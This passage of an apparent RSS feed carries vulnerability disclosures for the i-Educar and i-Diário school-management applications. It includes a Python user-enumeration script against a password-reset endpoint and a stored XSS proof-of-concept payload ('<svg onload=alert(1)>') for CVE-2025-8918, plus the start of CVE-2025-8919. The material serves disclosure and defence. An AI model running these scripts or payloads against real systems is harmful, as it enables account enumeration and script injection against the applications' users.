&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Content-Type&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;application/x-www-form-urlencoded&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Origin&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;http://x.x.x.x&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Referer&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;http://x.x.x.x/password/reset&amp;amp;#34;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;logins&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;admin&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;jose&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;maria&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;professor&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;aluno1&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;]&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;for&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;login&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;ow&amp;#34;&amp;gt;in&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;logins&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;response&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;requests&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;post&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;url&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;login&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;},&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;headers&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;headers&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;if&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;enviado&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;ow&amp;#34;&amp;gt;in&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;response&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;lower&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;():&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;sa&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;[&#43;] &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt; -&amp;amp;gt; EXISTE&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;elif&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;não encontramos&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;ow&amp;#34;&amp;gt;in&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;response&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;lower&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;():&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;sa&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;[-] &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt; -&amp;amp;gt; NÃO EXISTE&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This script was able to confirm which users are registered in the system based on the system&amp;#39;s response content.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Exposure of valid accounts: Attackers can confirm which users are registered in the system.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Facilitates brute force attacks: Valid users can be targeted by automated password guessing attempts.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Credential stuffing: Discovered accounts can be tested with leaked passwords from other services.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Targeted phishing: Attackers can send socially engineered emails to confirmed users, increasing the success rate of scams.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Loss of privacy: Simply confirming the existence of a user can expose sensitive data in certain contexts (e.g., accounts on restricted or confidential services).&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Attack escalation: User enumeration can serve as an initial step in exploiting more serious vulnerabilities, such as account takeovers.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Reputational damage: The perception of basic security flaws can affect credibility. of the application with users and customers.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://vuldb.com/?submit.627926&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://vuldb.com/?submit.627926&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/vanderlei50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vanderlei Princival&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8918</title>
        <link>https://www.cvehunters.com/p/cve-2025-8918/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8918/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8918-cross-site-scripting-xss-stored-endpoint-educar_instituicao_cadphp-parameter-bairro&amp;#34;&amp;gt;CVE-2025-8918: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_instituicao_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8918&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8918&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/intranet/educar_instituicao_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_instituicao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8918-cross-site-scripting-xss-stored-endpoint-educar_instituicao_cadphp-parameter-bairro&amp;#34;&amp;gt;CVE-2025-8918: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_instituicao_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8918&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8918&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/intranet/educar_instituicao_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_instituicao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Bairro&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8918/image.png&amp;#34;
	width=&amp;#34;1121&amp;#34;
	height=&amp;#34;480&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8918/image_hu_ca11c80f720a7acd.png 480w, /p/cve-2025-8918/image_hu_541791db714561e6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;560px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8918.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8918.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Fernanda Martins&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 13 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8919</title>
        <link>https://www.cvehunters.com/p/cve-2025-8919/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8919/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8919-multiples-cross-site-scripting-xss-stored-in-endpoint-objetivos-de-aprendizagem-e-habilidades&amp;#34;&amp;gt;CVE-2025-8919: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8919&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8919&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Código&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivo/Habilidade&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8919-multiples-cross-site-scripting-xss-stored-in-endpoint-objetivos-de-aprendizagem-e-habilidades&amp;#34;&amp;gt;CVE-2025-8919: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8919&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8919&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Código&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivo/Habilidade&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
